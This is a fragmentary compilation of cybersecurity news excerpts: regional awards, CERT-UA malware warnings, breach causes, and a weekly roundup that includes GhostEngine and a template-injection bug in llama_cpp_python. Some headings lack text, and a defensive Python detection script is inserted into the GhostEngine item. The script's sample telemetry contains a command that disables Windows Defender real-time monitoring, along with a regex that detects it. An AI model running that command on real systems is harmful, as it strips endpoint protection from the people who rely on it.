- a retired police officer concerned that his home address may have been shared with criminals he was involved in the prosecution and incarceration of.
World Cybercon 3.0 META Awards Celebrate Champions of Cybersecurity in the Middle East
The Cyber Express Cybersecurity Person of 2024 (META): Man
- Thomas Heuckeroth, SVP IT Infrastructure & Digital Platforms, Emirates Group
The Cyber Express Cybersecurity Person of 2024 (META): Woman
- Dr. Hoda A Alkhzaimi, EMaratsec
The Cyber Express Cybersecurity Diversity and Inclusion Advocates of 2024
- Yana Li, WebBeds
- Dina AlSalamen, Bank ABC (Jordan)
- Rudy Shoushany, DxTalks
- Aus Alzubaidi, MBC Group
- Saltanat Mashirova, Honeywell
The Cyber Express Infosec Guardians of 2024 (BFSI)
- Anthony Sweeney, Deribit
- Bipin Mehta, HSBC Bank
- Syed Muhammad Ali Naqvi, HBL Bank
- Kiran Kumar PG, Alpheya
- Ahmed Nabil Mahmoud, Abu Dhabi Islamic Bank
The Cyber Express Infosec Guardians of 2024 (Government & Critical Entities)
- Talal AlBalas from Abu Dhabi Quality and Conformity Council (ADQCC)
- Abdulwahab Abdullah Algamhi, UAE ICP
- Vinoth Inbasekaran, Dubai Government Entity - Alpha Data
- Dr Hamad Khalifa Alnuaimi, Abu Dhabi Police
- Dr Saeed Almarri, Dubai Police
The Cyber Express Top Cybersecurity Influencers of 2024
- Dr. Mohammad Al Hassan, Abu Dhabi University
- Maryam Eissa Alhammadi, Ministry of Interior
- Hadi Anwar, CPX
- Waqas Haider, HBL Microfinance Bank
- Chenthil Kumar, Red Sea International
- Nishu Mittal, Emirates NBD
- Nisha Rani, Emirates Leisure Retail
The Cyber Express Top InfoSec Leaders 2024
- Mohamad Mahjoub, Veolia Near and Middle East
- Ankit Satsangi, Beeah Group
- Gokul Vasudev, Dubai Health Authority
- Ashish Khanna, SHARAF GROUP
- Abhilash Radhadevi, Oq Trading
- Prashant Nair, Airtel Africa PLC
The Cyber Express Top Infosec Entrepreneurs 2024
- May Brooks Kempler, Helena
- Illyas Kooliyankal, CyberShelter
- Kazi Monirul, Spider Digital
- Muneeb Anjum, AHAD
- Craig Bird, CloudTech24
- Zaqiuddin Khan, Tech Experts LLC
- Alireza Shaban ghahrod, Diyako Secure Bow
Insightful Discussions and Networking
The awards set a celebratory tone that carried through the rest of the conference. The day commenced with a vibrant atmosphere as attendees gathered for registration and explored the exhibition area, setting the stage for a day of insightful discussions and networking opportunities. Augustin Kurian, Editor-in-Chief of The Cyber Express, extended a warm welcome, emphasizing the importance of collaborative efforts in cultivating a secure cyber environment.
Keynote and Panel Sessions
Irene Corpuz, Co-Founder of Women in Cybersecurity Middle East, delivered the opening keynote, shedding light on the imperative of incubating security and nurturing a cyber-aware culture, particularly within startup ecosystems. Corpuz's address highlighted the significance of proactive measures in addressing cybersecurity challenges from the outset. Panel discussions served as focal points for in-depth exploration of key cybersecurity issues. From navigating cyber threats to leveraging innovative approaches for threat detection, industry experts provided valuable insights into emerging trends and strategic investments in cybersecurity. Notable panelists included Waqas Haider of HBL Microfinance Bank, Beenu Arora of Cyble, and Azhar Zahiruddin of Chalhoub Group, among others.
Diversity and Inclusion
The Cyber Express's World CyberCon Meta Edition event also celebrated diversity and inclusion in cybersecurity, honoring advocates who have championed these principles within their respective domains. Yana Li of WebBeds and Dina AlSalamen of Bank ABC were among the esteemed recipients of The Cyber Express Cybersecurity Diversity and Inclusion Advocates of 2024 award, acknowledging their efforts in fostering an inclusive cyber community. Strategic insights were further highlighted during panel discussions focusing on fortifying against ransomware and the role of AI and ML in enhancing threat detection. Expert moderators facilitated engaging conversations, addressing critical challenges and sharing best practices for prevention, mitigation, and swift recovery.
Conclusion
The Cyber Express World Cybercon 3.0 META Cybersecurity Conference successfully raised the bar for the collective dedication of cybersecurity professionals in the META region. By fostering dialogue, sharing insights, and recognizing excellence, the event played an important role in advancing cybersecurity resilience and shaping the future of cybersecurity across industries. The Cyber Express awards recognized the hard work and innovative solutions of the finest brains in cybersecurity, emphasizing the message that collaborative and proactive actions are critical to protecting our digital future.
Russian Hackers Use Legit Remote Monitoring Software to Spy on Ukraine and Allies
Possible Defense Against Ongoing Remote Monitoring Campaign
CERT-UA recommends the following:
- Organizations not using SuperOps RMM should verify the absence of network activity associated with the domain names: [.]superops[.]com, [.]superops[.]ai.
- Improve employee cyber hygiene.
- Use and constantly update anti-virus software.
- Regularly update operating systems and software.
- Use strong passwords and change them regularly.
- Back up important data.
Ukrainian Financial Institutions Also on Smokeloader’s Radar
The financially motivated group UAC-0006 has actively launched phishing attacks targeting Ukraine through 2023. CERT-UA reported the resurfacing of UAC-0006 in spring 2024, with hackers attempting to distribute Smokeloader, a common malware in the group's toolkit. This threat group's goal has primarily been to steal credentials and execute unauthorized fund transfers, posing a significant risk to financial systems. SmokeLoader is a malicious bot application and trojan that can evade security measures to infect Windows devices. It can then install other malware, steal sensitive data and damage files, among other issues. Throughout 2023, UAC-0006 conducted several phishing campaigns against Ukraine, exploiting financial lures and using ZIP and RAR attachments to distribute Smokeloader. CERT-UA last week issued another warning about a significant surge in UAC-0006 activity. Hackers have conducted at least two campaigns to distribute Smokeloader, displaying similar patterns to previous attacks. The latest operations involve emails with ZIP archives containing images that include executable files and Microsoft Access files with macros that execute PowerShell commands to download and run other executable files. After initial access, the attackers download additional malware, including TALESHOT and RMS. The botnet currently consists of several hundred infected computers. CERT-UA anticipates an increase in fraudulent operations involving remote banking systems and thus strongly recommends enhancing the security of accountants' automated workstations and ensuring the implementation of necessary policies and protection mechanisms to reduce infection risks.
Bitdefender Launches 'Scamio' on WhatsApp: A New AI Tool to Combat Online Scams in Australia
Bitdefender’s Scamio is Now Available on WhatsApp in Australia
Bitdefender Scamio is an AI-driven chatbot that analyzes data and provides a verdict within seconds, along with recommendations for further action. Additionally, with this latest integration with WhatsApp, over 7.4M Australian users can use Scamio as their personal scam checker.
Source: Bitdefender
The integration of Bitdefender’s Scamio with WhatsApp was a strategic response to the increasing use of artificial intelligence by malicious actors. Scammers were exploiting popular messaging apps and online services to steal money, credentials, and personal data. By integrating Scamio into WhatsApp, Bitdefender aimed to disrupt these criminal activities by offering a sophisticated tool capable of keeping pace with online scam tactics. The enhanced accessibility provided by this feature aimed to provide an additional layer of security for Australians, who were disproportionately targeted by online fraudsters. Having Scamio available within WhatsApp streamlined the scam verification process for everyday users, reducing the time and effort required to identify potential scams.
How to use Bitdefender’s Scamio for Scam Detection?
In the USA and other countries, online scams remained a major concern, with the number of internet fraud reports rising in recent years. Phishing and online shopping scams were among the most common types reported. To combat this issue, governments intensified efforts to inform the public and assist in preventing internet fraud and scams. Scamio, Bitdefender's next-gen AI chatbot, combined artificial intelligence with exceptional threat-detection algorithms, machine learning, pattern recognition, and advanced data analysis techniques to identify even the most sophisticated scams. Accessible on any device without requiring installation, Scamio helped users quickly verify suspicious links, text messages, emails, and QR codes—all for free. To use this chatbot, users could access the web app or add it as a contact on WhatsApp or Facebook Messenger. Once logged in, users could describe scam details, copy and paste texts or links, or upload pictures or screenshots of deceptive messages. Scamio then analyzed the material and provided recommendations to ensure users didn't fall victim to cybercriminals.
The Importance of Patching Vulnerabilities in Cybersecurity
One of the most critical yet often overlooked aspects of cybersecurity is the timely patching of vulnerabilities. While much attention is given to sophisticated phishing attacks and the menace of password brute-forcing, the importance of addressing unpatched vulnerabilities cannot be overstated. These vulnerabilities represent low-hanging fruit for cybercriminals, offering a relatively straightforward path into systems. […]
The post The Importance of Patching Vulnerabilities in Cybersecurity appeared first on TuxCare.
The post The Importance of Patching Vulnerabilities in Cybersecurity appeared first on Security Boulevard.
Decoding the Primary Devils Behind Data Breaches
Critical weaknesses behind Data Breaches
Weak and stolen credentials
Although hacking attacks are frequently cited as the leading cause of data breaches, it's often the vulnerability of compromised or weak passwords or personal data that opportunistic hackers exploit. Statistics show that four out of five breaches are partially attributed to the use of weak or stolen passwords. To mitigate the risk of hackers executing an account takeover on sensitive accounts, businesses should consider deploying fraud protection tools. These act as proactive defenses, significantly reducing the likelihood of unauthorized access and enhancing the overall security of your accounts. A bot manager also addresses the challenges associated with bot traffic on websites and applications; it is designed to identify, manage, and mitigate both malicious and non-malicious bot traffic, ensuring a more secure and efficient online experience. To further protect your organization, it’s also advisable to implement enterprise single sign-on (SSO), establish strong password hygiene, and set up phishing-resistant multi-factor authentication (MFA) across computer systems — this way, you can prevent personally identifiable information from getting into the wrong person’s hands.
Backdoor and application vulnerabilities
Exploiting backdoor and application vulnerabilities is a favored strategy among cybercriminals. When software applications are poorly written or network systems are inadequately designed, hackers will continuously probe for weaknesses to find open doors that grant them direct access to valuable data and confidential information. Ensuring your web application firewall (WAF) is regularly updated and well-managed helps mitigate these vulnerabilities. Due to constantly shifting attack techniques, organizations should also use advanced artificial intelligence (AI) powered security solutions to identify vulnerabilities and protect against unauthorized access. The WAF should be a robust security solution designed to protect web applications from a variety of cyber threats, including data breaches. It can serve as a barrier between web applications and the internet, scrutinizing and filtering HTTP traffic to identify and mitigate potential vulnerabilities and attacks.
Malware
The prevalence of both direct and indirect malware is increasing. Malware (inherently malicious software) is loaded onto a system by unsuspecting victims, providing hackers with opportunities to not only exploit the affected system but also potentially spread to other connected systems. This type of malware poses a significant security threat as it allows malicious insiders access to confidential information and provides the ability to steal data for financial gain. Implementing an advanced malware protection solution at multiple ingress points in the network can significantly enhance your security posture, reducing the risk that employees will fall victim to malicious software. By leveraging cutting-edge data security in malware detection and prevention, organizations can fortify their data protection defenses against evolving cyber threats and security breaches.
Social Engineering
Cybercriminals and hackers can shorten the effort of establishing unauthorized access by persuading individuals with legitimate data access to do it for them. Phone calls, phishing scams, malicious links (often sent via email, text, or social media), and other forms of social engineering such as deepfakes are now commonly used to manipulate individuals into unwittingly granting access or divulging sensitive information like login credentials to cybercriminals. Such information can result in a data leak, in which hackers recycle, reuse, and trade sensitive data like Social Security numbers or personal data for the purpose of identity theft and other illicit activities. Exercising vigilance when sharing sensitive information with external parties is essential. Awareness of the information being shared, and verification of its legitimacy, can serve as a simple yet effective defense against social engineering tactics.
Ransomware
Ransomware is a type of malicious software designed to restrict access to a computer system or files until a sum of money, or ransom, is paid. It typically encrypts the victim's files or locks their system, rendering it inaccessible, and then demands payment (often in cryptocurrency) in exchange for restoring access. Ensuring the safety and protection of your infrastructure against external threats is paramount. Organizations must be confident that attackers haven’t gained access to their systems and aren’t using them for malicious activities. Implementing a robust visibility and protection solution, such as microsegmentation, will be helpful in this scenario. Microsegmentation offers a straightforward, fast, and intuitive approach to enforcing Zero Trust principles within your network. This solution is designed to prevent lateral movement by visualizing activity in your IT environments, implementing precise microsegmentation policies, and swiftly detecting potential breaches.
Improper configuration and exposure via APIs
Misconfigured settings or parameters encompass various issues such as default passwords, open ports, or weak encryption. Such inadequacies can create vulnerabilities that hackers may exploit to gain unauthorized access to systems or data, leading to security breaches and other malicious activities. Inadequate configuration settings and vulnerabilities in APIs can expose them to a large number of security risks. Addressing and rectifying these issues is crucial to prevent unauthorized access and potential data breaches. Consider implementing proper API security and governance from code time to runtime, including regularly auditing API security measures, which are critical steps to enhance overall protection. To address misconfiguration and exposure via APIs, businesses must rely not just on their WAF but also on deploying an advanced API security solution to protect against evasive API abuses. This solution can offer comprehensive visibility, identifying vulnerabilities and detecting potential threats and abuses related to APIs. Moreover, it helps organizations establish a more proactive approach to security by lowering the overall attack surface of critical APIs from secure development to runtime protection, effectively reinforcing their overall API security posture.
DNS attacks
Domain Name System (DNS) attacks are malicious activities that target the DNS infrastructure to disrupt or manipulate the resolution of domain names into IP addresses. These attacks can have various objectives, including causing service disruptions using distributed denial of service (DDoS), redirecting users to malicious websites, or gaining unauthorized access to sensitive information. Organisations must deploy a strong cloud-based authoritative DNS service ensuring 100% availability and protection against multi-vector DNS attacks like flooding and water torture attacks. Implementing best practices and deploying security countermeasures that are able to withstand the attack volume are crucial steps to take when mitigating these attacks.
Conclusion
Data breaches continue to pose a pervasive risk across various sectors, affecting organizations of all sizes and types — from healthcare and finance to e-commerce and retail. By proactively identifying potential vulnerabilities, organizations can reduce the likelihood of successful cyberattacks. Investing in robust security measures that enforce a Zero Trust Security model and ensuring their applications, APIs, and DNS services are continuously protected against cyber threats helps mitigate financial risks associated with breaches, such as regulatory fines, legal fees, and revenue loss. By minimizing the impact of breaches, organizations can also maintain business continuity — and avoid disruptions to normal operations or damaged reputations. Overall, a comprehensive understanding of breach causes and the implementation of appropriate security measures are vital for protecting data, minimizing risk, and ensuring the long-term success of all organizations. Disclaimer: The views and opinions expressed in this guest post are solely those of the author(s) and do not necessarily reflect the official policy or position of The Cyber Express. Any content provided by the author is of their opinion and is not intended to malign any religion, ethnic group, club, organization, company, individual, or anyone or anything.
This week on TCE Cyberwatch: Snapchat AI to political unrest in Kyrgyzstan
TCE Cyberwatch Weekly Update
Explore the newest updates and stay informed with TCE Cyberwatch.
USDoD announces plans to resurrect BreachForum’s community
The FBI's takedown of BreachForums, a key cybercrime marketplace, marked a significant victory against cybercrime. However, less than 24 hours later, the cybercriminal known as USDoD announced plans to resurrect the forum’s community. BreachForums had been central for trading stolen data and hacking tools, and its removal was a major achievement, but USDoD and another administrator, ShinyHunters, claimed that they would revive the site. USDoD vowed to launch a new forum, Breach Nation, with domains breachnation.io and databreached.io, which is set to go live on July 4, 2024. Robust infrastructure, enhanced security, and upgraded memberships for the first 200,000 users were some of the things that were offered.
Generative AI and its impact on the insurance industry
Generative AI has become a major topic in AI discussions, especially with advanced models like OpenAI’s GPT-4 and Google’s Gemini 1.5 Pro. Bloomberg predicts that the Generative AI market will reach USD 1.3 trillion by 2032, holding potential across industries, but specifically insurance. In insurance, Generative AI is expected to revolutionize operations, streamline claims by analyzing images and documents, speed up settlements and enhance customer satisfaction, improve decision-making, and reduce errors and cases of fraud through its data analysis capabilities. Generative AI can also provide tailored recommendations and engage with customers in conversations. While Generative AI offers significant advantages, its adoption must address concerns about data privacy and ethical AI usage.
Kyrgyzstan faces cyberattacks on government entities as mob violence occurs against foreign students
Bishkek, the capital of Kyrgyzstan, is currently experiencing severe mob violence and cyberattacks. The turmoil began with a viral video showing a fight between Kyrgyz and Egyptian medical students, which led to widespread violence against foreign students. Simultaneously, Kyrgyzstan is facing severe cyberattacks from various hacktivist groups. The attackers, calling themselves Team Insane PK, have allegedly attacked multiple governmental platforms, including the Ministry of Agriculture and the Education Portal of the Ministry of Emergency Situations, as well as private entities like Saima Telecom and several universities. Additionally, Silent Cyber Force, another Pakistan-based group, has allegedly targeted Kyrgyzstan’s Ministry of Defence and Ministry of Agriculture.
U.S. election causes worry surrounding several cyberattacks, specifically those of foreign interference
With the 2024 U.S. elections approaching, foreign interference, particularly through cyberattacks, has intensified. Democratic Senator Mark Warner noted the involvement of both state and non-state actors, including hacktivists and cybercriminals, who find it increasingly easy to disrupt U.S. politics. The Cybersecurity and Infrastructure Security Agency (CISA) is at the forefront of defending against these threats. CISA Director Jen Easterly emphasized that while election infrastructure is more secure than ever, the threat environment has become more complex, with foreign adversaries and generative AI capabilities posing significant risks. In response, CISA has ramped up its efforts, offering cybersecurity assessments, physical security evaluations, and training sessions to election stakeholders.
New Vulnerability Llama Drama spotted in Python package widely used by AI application developers
A critical vulnerability, CVE-2024-34359, dubbed Llama Drama, was recently discovered in a Python package widely used by AI application developers. Discovered by researcher Patrick Peng, the vulnerability affects the llama_cpp_python package, which integrates AI models with Python and is related to the Jinja2 template rendering tool used for generating HTML. Checkmarx, a cybersecurity firm, explained that the issue arises from llama_cpp_python using Jinja2 for processing model metadata without implementing proper security measures like sandboxing. This oversight enables template injection attacks, allowing for arbitrary code execution on systems using the affected package. More than 6,000 AI models that use llama_cpp_python and Jinja2 are impacted by this.
Europol investigating a black hat hacker who claims to have stolen classified data from their systems
Europol is investigating a black hat hacker, IntelBroker, who claims to have stolen classified data from their system. The hacker allegedly accessed classified information, like employee data and source codes, from various branches of Europol, like the Europol Platform for Experts (EPE). IntelBroker posted screenshots as proof and later claimed to have sold the data. Europol confirmed the incident and assured that no operational data was compromised. The agency has taken initial actions, and the EPE website is temporarily down for maintenance. Additionally, IntelBroker claimed to have hacked Zscaler, a cybersecurity firm, offering to sell access to their systems. Zscaler is investigating but has not found evidence of impact, other than a test environment exposed to the internet, though it's unclear if it was involved in the breach.
Palo Alto Networks' forecast falls short of investor expectations
Palo Alto Networks' fourth-quarter billings forecast fell short of investor expectations, signaling restrained corporate spending on cybersecurity amid economic uncertainty and persistent inflation. This caution has driven companies to diversify their cybersecurity investments to avoid reliance on a single vendor, leading to a reduced growth outlook for firms like Palo Alto Networks. The company projected fourth-quarter billings between $3.43 billion and $3.48 billion, aligning closely with analysts' estimates but reflecting broader concerns about slowed growth in the sector. Analysts highlighted the lack of significant positive momentum in the revised forecasts put out by Palo Alto following this. However, the forecasts follow similar cautionary predictions from rivals like Fortinet, which hint at a broader trend of cautious spending in the cybersecurity industry.
Australia passes its first legislation for a national digital ID
Australia has passed its first legislation for a national digital ID, called myGovID, set to come into effect in November. This eliminates the need for multiple forms of physical ID. Lauren Perry from the UTS Human Technology Institute explains that the digital ID will streamline the cumbersome process of collecting and verifying multiple ID documents. The system acts as an intermediary between the user and organizations requiring identity verification. Users will interact with organizations through an app, inputting a government-registered number to confirm their identity. Currently, the myGovID app serves this purpose, but private providers like MasterCard or Visa could join the system, enhancing security and reducing fraud risks.
Western Sydney University faces a cybersecurity breach affecting 7,500 individuals.
Western Sydney University faced a cybersecurity breach that affected around 7,500 individuals. The breach, first identified in January 2024, was traced back to May 2023 and involved unauthorized access to the university’s Microsoft Office 365 platform, including SharePoint files and email accounts, and their Solar Car Laboratory infrastructure. WSU swiftly shut down its IT network and implemented security measures upon discovering the breach. The university has assured that no ransom demands have been made for the compromised information. The NSW Police and Information and Privacy Commission are helping to investigate the incident. The NSW Supreme Court has issued an injunction to prevent the unauthorized use of the compromised data, highlighting the legal implications of such breaches.
ICO releases warning about data protection risks associated with generative AI for Snapchat
The UK's Information Commissioner’s Office (ICO) has warned about the data protection risks associated with generative AI. The ICO found that the company that owned Snapchat, Snap, had not adequately assessed the data protection risks for its chatbot, which interacts with Snapchat’s 414 million daily users. The ICO issued a Preliminary Enforcement Notice to Snap on October 6, highlighting a failure to properly evaluate privacy risks, especially for users aged 13 to 17. This led to Snap undertaking a comprehensive risk assessment and implementing the necessary steps, which the ICO then deemed compliant with data protection laws. Snapchat has integrated prevention of harmful responses from the chatbot and is working on additional tools to give parents more control over their children’s use of 'My AI'. The ICO will continue to monitor Snapchat's generative AI developments and enforce compliance to protect public privacy rights.
New malware named GhostEngine to exploit vulnerable drivers and install crypto mining software
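As an added example illustrating the detection guidance in the GhostEngine item that follows (not code from the article, Antiy Labs or any vendor product), this Python triages constructed endpoint telemetry for the listed indicators: PowerShell running from an uncommon directory, privilege elevation, Windows Defender tampering, driver loads from user-writable locations, and DNS lookups to mining pools. The event format, the PowerShell directory allow-list, the mining-pool domains and the driver file name are all assumptions.

```python
import re
from dataclasses import dataclass

# Constructed allow-list of directories PowerShell is expected to run from
# (assumption; tune per estate).
EXPECTED_POWERSHELL_DIRS = (
    r"c:\windows\system32\windowspowershell\v1.0",
    r"c:\windows\syswow64\windowspowershell\v1.0",
    r"c:\program files\powershell\7",
)
# Placeholder mining-pool domains; a real deployment would take these
# from threat intelligence, not from this list.
MINING_POOL_DOMAINS = ("xmr.example-pool.test", "pool.example-miner.test")
# Directories from which a kernel driver load is abnormal (constructed).
USER_WRITABLE_DIRS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Command lines that switch off Windows Defender features.
DEFENDER_TAMPER = re.compile(r"set-mppreference\b.*-disable", re.I)


@dataclass
class Alert:
    rule: str
    event: dict


def parse_event(line: str) -> dict:
    """Parse one constructed 'key=value|key=value' telemetry line."""
    event = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        event[key.strip()] = value.strip()
    return event


def evaluate(event: dict) -> list:
    """Return the alerts a single event triggers, in rule order."""
    alerts = []
    kind = event.get("type")
    image = event.get("image", "").lower()
    if kind == "process":
        if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
            folder = image.rsplit("\\", 1)[0]
            if folder not in EXPECTED_POWERSHELL_DIRS:
                alerts.append(Alert("powershell_uncommon_dir", event))
            if DEFENDER_TAMPER.search(event.get("cmdline", "")):
                alerts.append(Alert("defender_tampering", event))
        # Child running as SYSTEM spawned by a lower-integrity parent.
        if (event.get("integrity", "").lower() == "system"
                and event.get("parent_integrity", "").lower() not in ("system", "")):
            alerts.append(Alert("privilege_elevation", event))
    elif kind == "driver_load":
        if (image.startswith(USER_WRITABLE_DIRS)
                or event.get("signed", "").lower() != "true"):
            alerts.append(Alert("suspicious_driver_load", event))
    elif kind == "dns":
        query = event.get("query", "").lower()
        if any(query == d or query.endswith("." + d) for d in MINING_POOL_DOMAINS):
            alerts.append(Alert("mining_pool_dns", event))
    return alerts


def triage(lines) -> list:
    """Run every rule over every non-empty line; returns Alert objects."""
    return [a for line in lines if line.strip() for a in evaluate(parse_event(line))]


# Constructed sample telemetry: a benign baseline plus the behaviours named
# in the write-up. The driver file name is a placeholder, not a real IoC.
SAMPLE_LOG = r"""
type=process|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmdline=powershell -File C:\scripts\inventory.ps1|integrity=medium|parent_integrity=medium
type=process|image=C:\Windows\Fonts\powershell.exe|cmdline=powershell -File C:\Windows\Fonts\get.ps1|integrity=system|parent_integrity=medium
type=process|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmdline=powershell Set-MpPreference -DisableRealtimeMonitoring $true|integrity=high|parent_integrity=high
type=driver_load|image=C:\ProgramData\drv\PLACEHOLDER-vulnerable-driver.sys|signed=true
type=driver_load|image=C:\Windows\System32\drivers\disk.sys|signed=true
type=dns|query=xmr.example-pool.test
type=dns|query=update.example-vendor.test
"""

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG.splitlines()):
        print(alert.rule, "<-", alert.event.get("image") or alert.event.get("query"))
```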
A novel malware campaign dubbed "REF4578" uses a malware called GhostEngine to disable endpoint detection and response (EDR) solutions and install crypto mining software. The malware exploits vulnerable drivers to terminate EDR agents, ensuring the persistence of the XMRig miner, which is used to mine Monero cryptocurrency without detection. The malware also installs a backdoor and includes an EDR agent controller and miner module to tamper with security tools and enable remote command execution via a PowerShell script. Researchers at Antiy Labs, despite extensive analysis, were unable to identify specific targets or the threat actor behind the campaign. To detect GhostEngine, organizations should monitor for initial suspicious activities such as unusual PowerShell execution, execution from uncommon directories, privilege elevation, and vulnerable driver deployment. Key indicators include abnormal network traffic, DNS lookups pointing to mining pool domains, and specific behavior prevention events like unusual process execution and tampering with Windows Defender.
Wrap Up
The ever-evolving landscape of cybersecurity requires constant vigilance. By staying informed about the latest threats and taking proactive measures, we can minimize the impact of cyberattacks and protect ourselves online. As always, we can see that there is unrest present everywhere and cybercrimes play a huge role in that. TCE Cyberwatch is committed to keeping you informed about the latest developments in cybersecurity. Stay tuned for more in-depth analysis and actionable advice.
The U.S. Moves a Step Closer to a Cyber Force
CYBERCOM Under Siege
Cyber defense has been under the U.S. Cyber Command, or CYBERCOM, since 2010. CYBERCOM brings together personnel from the separate service branches, but that arrangement has come under increasing scrutiny as an inadequate solution to a growing global threat. A 2022 GAO study noted problems with cyber training, staffing and retention across the service branches, and a Foundation for Defense of Democracies (FDD) study in March of this year detailed problems with the lack of a singular approach to cyber defense. “The inefficient division of labor between the Army, Navy, Air Force, and Marine Corps prevents the generation of a cyber force ready to carry out its mission,” the FDD report said. “Recruitment suffers because cyber operations are not a top priority for any of the services, and incentives for new recruits vary wildly. The services do not coordinate to ensure that trainees acquire a consistent set of skills or that their skills correspond to the roles they will ultimately fulfill at CYBERCOM.” Promotion systems often hold back skilled cyber personnel because the systems were designed to evaluate service members who operate on land, at sea, or in the air, not in cyberspace. Retention rates for qualified personnel are low because of inconsistent policies, institutional cultures that do not value cyber expertise, and insufficient opportunities for advanced training. “Resolving these issues requires the creation of a new independent armed service – a U.S. Cyber Force – alongside the Army, Navy, Air Force, Marine Corps, and Space Force.” The FDD report concluded, “America’s cyber force generation system is clearly broken. Fixing it demands nothing less than the establishment of an independent cyber service.”